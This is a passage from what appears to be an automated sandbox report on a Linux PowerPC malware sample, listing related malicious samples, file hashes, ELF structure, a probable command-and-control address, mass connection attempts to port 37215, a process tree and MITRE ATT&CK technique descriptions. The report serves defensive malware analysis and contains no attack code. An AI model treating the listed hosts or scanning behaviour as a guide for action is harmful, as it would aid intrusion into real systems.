	arm7	Get hash	malicious	Browse	117.35.219.196
	7NuxE5BCX7	Get hash	malicious	Browse	120.135.246.162
	IS4scKXqIr	Get hash	malicious	Browse	120.134.45.6
	5tmxDvVI5V	Get hash	malicious	Browse	117.35.120.218
LINKdotNET-ASEG	MkyxPXGeTq	Get hash	malicious	Browse	45.242.108.14
	TlhOKlVSwf	Get hash	malicious	Browse	41.179.6.194
	eFsSvDKams	Get hash	malicious	Browse	45.242.133.14
	KHSQ48GkGn	Get hash	malicious	Browse	197.160.66.227
	Hilix.arm	Get hash	malicious	Browse	45.242.108.39
	Hilix.arm7	Get hash	malicious	Browse	45.243.89.42
	Hilix.x86	Get hash	malicious	Browse	45.244.195.29
	o6aMoZKsIK	Get hash	malicious	Browse	41.179.108.44
	8VANaS473t	Get hash	malicious	Browse	41.178.243.106
	t7WU0JjLAR	Get hash	malicious	Browse	197.160.192.236
	Antisocial.x86	Get hash	malicious	Browse	45.244.195.57
	Antisocial.arm	Get hash	malicious	Browse	45.244.195.50
	w66OTKGVFv	Get hash	malicious	Browse	41.196.116.155
	swOGb2sZYt	Get hash	malicious	Browse	41.196.201.5
	ydZLm6GD56	Get hash	malicious	Browse	45.247.65.109
	BitmCvTrdO	Get hash	malicious	Browse	197.166.142.80
	UQnO4DB8Z1	Get hash	malicious	Browse	197.166.142.60
	OhUy3woBmb	Get hash	malicious	Browse	45.242.108.19
	mP1pg0ryFA	Get hash	malicious	Browse	197.166.142.55
	yxD7DmfG2j	Get hash	malicious	Browse	41.179.108.56
RAYAZMA-ASIR	IdR7xl9k9N	Get hash	malicious	Browse	185.42.227.116

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

/proc/5286/oom_score_adj Download File
Process:	/usr/sbin/sshd
File Type:	ASCII text
Category:	dropped
Size (bytes):	6
Entropy (8bit):	1.7924812503605778
Encrypted:	false
SSDEEP:	3:ptn:Dn
MD5:	CBF282CC55ED0792C33D10003D1F760A
SHA1:	007DD8BD75468E6B7ABA4285E9B267202C7EAEED
SHA-256:	FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
SHA-512:	4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
Malicious:	false
Reputation:	high, very likely benign file
Preview:	-1000.

/run/sshd.pid Download File
Process:	/usr/sbin/sshd
File Type:	ASCII text
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:CJ:CJ
MD5:	FD7D13D8915168E1FA59546966B246A8
SHA1:	BFD7D9D37901150D43877320C27E87289DCF5329
SHA-256:	7A3A168A74320D3AF5EC954E29A61CA032A01BEB82D1F1763AFFE8A019E451F3
SHA-512:	9B265063A8F7B46298B915E8710F24EB506F2730726F9B9D98C0F687A03C16CA30147D1BCD1C9E84330F0C85D8D9E32F2EA8C526B4CC32719C8812206749BCF1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	5286.

Static File Info

General
File type:	ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.297947375560919
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	MePwVTNRoA
File size:	58456
MD5:	9084c57fbabbee4ccef6bc105869d070
SHA1:	f0e374caec84c854f3462733c0d8222aad591620
SHA256:	514cfc468b96cb8732a5c04796b683b9c5dd957e050611a631ad747b6351b598
SHA512:	e2492e98722861f44f14efdef1cec4d358b1e11173ad6951140518b0b07ddbc99a22f6d48ef32f799dd5a5ad967ad56b8adfe30252bdb5a658d891318b25bbba
SSDEEP:	1536:EAyte19QO0+lQZMoNrXnafkfiLWNIUFK53mS:YHO0ufoNjafkf5NIUbS
File Content Preview:	.ELF...........................4...x.....4. ...(.......................l...l...........................,............dt.Q.............................!..\|......$H...H......$8!. \|...N.. .!..\|.......?.............../...@..\?........+../...A..$8...})......N..

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	PowerPC
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x100001f0
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	57976
Section Header Size:	40
Number of Section Headers:	12
Header String Table Index:	11

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x10000094	0x94	0x24	0x0	0x6	AX	4
.text	PROGBITS	0x100000b8	0xb8	0xcc5c	0x0	0x6	AX	4
.fini	PROGBITS	0x1000cd14	0xcd14	0x20	0x0	0x6	AX	4
.rodata	PROGBITS	0x1000cd34	0xcd34	0x1138	0x0	0x2	A	4
.ctors	PROGBITS	0x1001e000	0xe000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x1001e008	0xe008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x1001e018	0xe018	0x1f4	0x0	0x3	WA	8
.sdata	PROGBITS	0x1001e20c	0xe20c	0x20	0x0	0x3	WA	4
.sbss	NOBITS	0x1001e22c	0xe22c	0x8c	0x0	0x3	WA	4
.bss	NOBITS	0x1001e2b8	0xe22c	0x25c	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0xe22c	0x4b	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x10000000	0x10000000	0xde6c	0xde6c	4.2988	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0xe000	0x1001e000	0x1001e000	0x22c	0x514	1.6790	0x6	RW	0x10000	.ctors .dtors .data .sdata .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2021 02:18:25.353107929 CET	41604	45	192.168.2.23	37.0.9.202
Nov 2, 2021 02:18:25.358292103 CET	24598	37215	192.168.2.23	197.170.182.211
Nov 2, 2021 02:18:25.358330965 CET	24598	37215	192.168.2.23	197.202.211.211
Nov 2, 2021 02:18:25.358338118 CET	24598	37215	192.168.2.23	156.173.156.3
Nov 2, 2021 02:18:25.358360052 CET	24598	37215	192.168.2.23	197.12.174.90
Nov 2, 2021 02:18:25.358397007 CET	24598	37215	192.168.2.23	156.17.210.61
Nov 2, 2021 02:18:25.358417988 CET	24598	37215	192.168.2.23	41.79.199.188
Nov 2, 2021 02:18:25.358429909 CET	24598	37215	192.168.2.23	197.173.103.8
Nov 2, 2021 02:18:25.358438969 CET	24598	37215	192.168.2.23	197.29.36.203
Nov 2, 2021 02:18:25.358439922 CET	24598	37215	192.168.2.23	197.192.232.101
Nov 2, 2021 02:18:25.358454943 CET	24598	37215	192.168.2.23	41.240.8.60
Nov 2, 2021 02:18:25.358469963 CET	24598	37215	192.168.2.23	197.48.195.180
Nov 2, 2021 02:18:25.358484030 CET	24598	37215	192.168.2.23	156.128.146.240
Nov 2, 2021 02:18:25.358486891 CET	24598	37215	192.168.2.23	197.112.103.101
Nov 2, 2021 02:18:25.358500004 CET	24598	37215	192.168.2.23	156.118.63.44
Nov 2, 2021 02:18:25.358500004 CET	24598	37215	192.168.2.23	156.138.35.236
Nov 2, 2021 02:18:25.358520985 CET	24598	37215	192.168.2.23	197.97.134.4
Nov 2, 2021 02:18:25.358522892 CET	24598	37215	192.168.2.23	41.9.128.78
Nov 2, 2021 02:18:25.358541965 CET	24598	37215	192.168.2.23	156.32.150.224
Nov 2, 2021 02:18:25.358563900 CET	24598	37215	192.168.2.23	41.44.230.177
Nov 2, 2021 02:18:25.358577967 CET	24598	37215	192.168.2.23	156.168.32.235
Nov 2, 2021 02:18:25.358591080 CET	24598	37215	192.168.2.23	41.154.152.117
Nov 2, 2021 02:18:25.358601093 CET	24598	37215	192.168.2.23	197.141.110.25
Nov 2, 2021 02:18:25.358598948 CET	24598	37215	192.168.2.23	197.178.36.204
Nov 2, 2021 02:18:25.358619928 CET	24598	37215	192.168.2.23	41.232.207.168
Nov 2, 2021 02:18:25.358633995 CET	24598	37215	192.168.2.23	41.100.2.147
Nov 2, 2021 02:18:25.361644983 CET	24598	37215	192.168.2.23	197.4.52.171
Nov 2, 2021 02:18:25.361660004 CET	24598	37215	192.168.2.23	41.230.207.46
Nov 2, 2021 02:18:25.361665010 CET	24598	37215	192.168.2.23	197.100.246.239
Nov 2, 2021 02:18:25.361668110 CET	24598	37215	192.168.2.23	197.95.12.197
Nov 2, 2021 02:18:25.361671925 CET	24598	37215	192.168.2.23	156.61.187.249
Nov 2, 2021 02:18:25.361689091 CET	24598	37215	192.168.2.23	41.124.202.64
Nov 2, 2021 02:18:25.361701012 CET	24598	37215	192.168.2.23	41.185.115.36
Nov 2, 2021 02:18:25.361704111 CET	24598	37215	192.168.2.23	156.142.51.247
Nov 2, 2021 02:18:25.361707926 CET	24598	37215	192.168.2.23	156.213.9.226
Nov 2, 2021 02:18:25.361715078 CET	24598	37215	192.168.2.23	156.212.251.211
Nov 2, 2021 02:18:25.361718893 CET	24598	37215	192.168.2.23	197.93.26.85
Nov 2, 2021 02:18:25.361735106 CET	24598	37215	192.168.2.23	41.160.106.24
Nov 2, 2021 02:18:25.361742973 CET	24598	37215	192.168.2.23	41.201.82.220
Nov 2, 2021 02:18:25.361743927 CET	24598	37215	192.168.2.23	156.138.216.195
Nov 2, 2021 02:18:25.361743927 CET	24598	37215	192.168.2.23	41.219.229.244
Nov 2, 2021 02:18:25.361747026 CET	24598	37215	192.168.2.23	156.2.4.90
Nov 2, 2021 02:18:25.361747980 CET	24598	37215	192.168.2.23	197.100.115.254
Nov 2, 2021 02:18:25.361752987 CET	24598	37215	192.168.2.23	156.222.253.242
Nov 2, 2021 02:18:25.361768961 CET	24598	37215	192.168.2.23	197.110.226.106
Nov 2, 2021 02:18:25.361778975 CET	24598	37215	192.168.2.23	41.87.217.31
Nov 2, 2021 02:18:25.361783981 CET	24598	37215	192.168.2.23	41.141.187.222
Nov 2, 2021 02:18:25.361788988 CET	24598	37215	192.168.2.23	197.103.236.208
Nov 2, 2021 02:18:25.361800909 CET	24598	37215	192.168.2.23	41.132.232.168
Nov 2, 2021 02:18:25.361802101 CET	24598	37215	192.168.2.23	197.201.161.248
Nov 2, 2021 02:18:25.361816883 CET	24598	37215	192.168.2.23	156.238.225.135
Nov 2, 2021 02:18:25.361818075 CET	24598	37215	192.168.2.23	41.43.102.26
Nov 2, 2021 02:18:25.361829042 CET	24598	37215	192.168.2.23	156.34.81.123
Nov 2, 2021 02:18:25.361834049 CET	24598	37215	192.168.2.23	197.230.134.116
Nov 2, 2021 02:18:25.361857891 CET	24598	37215	192.168.2.23	197.242.207.221
Nov 2, 2021 02:18:25.361882925 CET	24598	37215	192.168.2.23	156.12.47.194
Nov 2, 2021 02:18:25.361886978 CET	24598	37215	192.168.2.23	41.110.46.119
Nov 2, 2021 02:18:25.361887932 CET	24598	37215	192.168.2.23	156.147.255.70
Nov 2, 2021 02:18:25.361891031 CET	24598	37215	192.168.2.23	197.27.131.162
Nov 2, 2021 02:18:25.361891031 CET	24598	37215	192.168.2.23	41.75.238.231
Nov 2, 2021 02:18:25.361891985 CET	24598	37215	192.168.2.23	41.179.249.127
Nov 2, 2021 02:18:25.361892939 CET	24598	37215	192.168.2.23	156.131.169.1
Nov 2, 2021 02:18:25.361916065 CET	24598	37215	192.168.2.23	156.96.87.135
Nov 2, 2021 02:18:25.361917973 CET	24598	37215	192.168.2.23	41.137.90.225
Nov 2, 2021 02:18:25.361921072 CET	24598	37215	192.168.2.23	41.193.153.178
Nov 2, 2021 02:18:25.361924887 CET	24598	37215	192.168.2.23	197.199.216.216
Nov 2, 2021 02:18:25.361928940 CET	24598	37215	192.168.2.23	41.106.243.231
Nov 2, 2021 02:18:25.361931086 CET	24598	37215	192.168.2.23	41.135.223.106
Nov 2, 2021 02:18:25.361933947 CET	24598	37215	192.168.2.23	41.202.205.14
Nov 2, 2021 02:18:25.361937046 CET	24598	37215	192.168.2.23	41.228.195.224
Nov 2, 2021 02:18:25.361943007 CET	24598	37215	192.168.2.23	41.63.9.153
Nov 2, 2021 02:18:25.361944914 CET	24598	37215	192.168.2.23	156.177.6.111
Nov 2, 2021 02:18:25.361947060 CET	24598	37215	192.168.2.23	156.106.112.126
Nov 2, 2021 02:18:25.361948967 CET	24598	37215	192.168.2.23	41.19.224.206
Nov 2, 2021 02:18:25.361952066 CET	24598	37215	192.168.2.23	156.193.63.210
Nov 2, 2021 02:18:25.361955881 CET	24598	37215	192.168.2.23	156.99.171.162
Nov 2, 2021 02:18:25.361963034 CET	24598	37215	192.168.2.23	41.90.21.87
Nov 2, 2021 02:18:25.361965895 CET	24598	37215	192.168.2.23	197.11.163.174
Nov 2, 2021 02:18:25.361969948 CET	24598	37215	192.168.2.23	156.34.124.73
Nov 2, 2021 02:18:25.361969948 CET	24598	37215	192.168.2.23	197.72.181.144
Nov 2, 2021 02:18:25.361972094 CET	24598	37215	192.168.2.23	156.144.201.226
Nov 2, 2021 02:18:25.361973047 CET	24598	37215	192.168.2.23	41.245.112.88
Nov 2, 2021 02:18:25.361975908 CET	24598	37215	192.168.2.23	197.77.72.156
Nov 2, 2021 02:18:25.361977100 CET	24598	37215	192.168.2.23	156.135.220.189
Nov 2, 2021 02:18:25.361979961 CET	24598	37215	192.168.2.23	197.186.181.79
Nov 2, 2021 02:18:25.361984015 CET	24598	37215	192.168.2.23	41.105.109.17
Nov 2, 2021 02:18:25.361985922 CET	24598	37215	192.168.2.23	41.216.120.34
Nov 2, 2021 02:18:25.361988068 CET	24598	37215	192.168.2.23	41.253.121.176
Nov 2, 2021 02:18:25.361990929 CET	24598	37215	192.168.2.23	156.106.84.182
Nov 2, 2021 02:18:25.361995935 CET	24598	37215	192.168.2.23	156.42.124.80
Nov 2, 2021 02:18:25.362000942 CET	24598	37215	192.168.2.23	156.3.203.204
Nov 2, 2021 02:18:25.362000942 CET	24598	37215	192.168.2.23	197.181.23.71
Nov 2, 2021 02:18:25.362001896 CET	24598	37215	192.168.2.23	197.208.2.141
Nov 2, 2021 02:18:25.362003088 CET	24598	37215	192.168.2.23	156.242.198.127
Nov 2, 2021 02:18:25.362004042 CET	24598	37215	192.168.2.23	197.44.41.167
Nov 2, 2021 02:18:25.362011909 CET	24598	37215	192.168.2.23	156.164.169.167
Nov 2, 2021 02:18:25.362015009 CET	24598	37215	192.168.2.23	41.187.114.19
Nov 2, 2021 02:18:25.362015963 CET	24598	37215	192.168.2.23	156.45.109.120
Nov 2, 2021 02:18:25.362020016 CET	24598	37215	192.168.2.23	197.54.86.157
Nov 2, 2021 02:18:25.362023115 CET	24598	37215	192.168.2.23	41.214.136.32

HTTP Request Dependency Graph

127.0.0.1:52869

System Behavior

Analysis Process: MePwVTNRoA PID: 5238 Parent PID: 5118

General

Start time:	02:18:24
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	/tmp/MePwVTNRoA
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5240 Parent PID: 5238

General

Start time:	02:18:24
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5394 Parent PID: 5240

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5395 Parent PID: 5240

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5398 Parent PID: 5395

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5413 Parent PID: 5398

General

Start time:	02:21:32
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5415 Parent PID: 5398

General

Start time:	02:21:32
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5417 Parent PID: 5398

General

Start time:	02:21:32
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5418 Parent PID: 5398

General

Start time:	02:21:32
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5400 Parent PID: 5395

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5401 Parent PID: 5395

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5403 Parent PID: 5395

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5406 Parent PID: 5395

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5241 Parent PID: 5238

General

Start time:	02:18:24
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5243 Parent PID: 5238

General

Start time:	02:18:24
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5246 Parent PID: 5243

General

Start time:	02:18:24
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5386 Parent PID: 5246

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5387 Parent PID: 5246

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5390 Parent PID: 5246

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5391 Parent PID: 5246

General

Start time:	02:21:27
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5248 Parent PID: 5243

General

Start time:	02:18:24
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5249 Parent PID: 5243

General

Start time:	02:18:24
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5250 Parent PID: 5243

General

Start time:	02:18:24
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: MePwVTNRoA PID: 5251 Parent PID: 5243

General

Start time:	02:18:24
Start date:	02/11/2021
Path:	/tmp/MePwVTNRoA
Arguments:	n/a
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Analysis Process: systemd PID: 5285 Parent PID: 1

General

Start time:	02:18:37
Start date:	02/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 5285 Parent PID: 1

General

Start time:	02:18:37
Start date:	02/11/2021
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -t
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Analysis Process: systemd PID: 5286 Parent PID: 1

General

Start time:	02:18:38
Start date:	02/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 5286 Parent PID: 1

General

Start time:	02:18:38
Start date:	02/11/2021
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -D
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report MePwVTNRoA

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

PCAP (Network Traffic)

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

System Behavior

Analysis Process: MePwVTNRoA PID: 5238 Parent PID: 5118

General

Analysis Process: MePwVTNRoA PID: 5240 Parent PID: 5238

General

Analysis Process: MePwVTNRoA PID: 5394 Parent PID: 5240

General

Analysis Process: MePwVTNRoA PID: 5395 Parent PID: 5240

General

Analysis Process: MePwVTNRoA PID: 5398 Parent PID: 5395

General

Analysis Process: MePwVTNRoA PID: 5413 Parent PID: 5398

General

Analysis Process: MePwVTNRoA PID: 5415 Parent PID: 5398

General

Analysis Process: MePwVTNRoA PID: 5417 Parent PID: 5398

General

Analysis Process: MePwVTNRoA PID: 5418 Parent PID: 5398

General

Analysis Process: MePwVTNRoA PID: 5400 Parent PID: 5395

General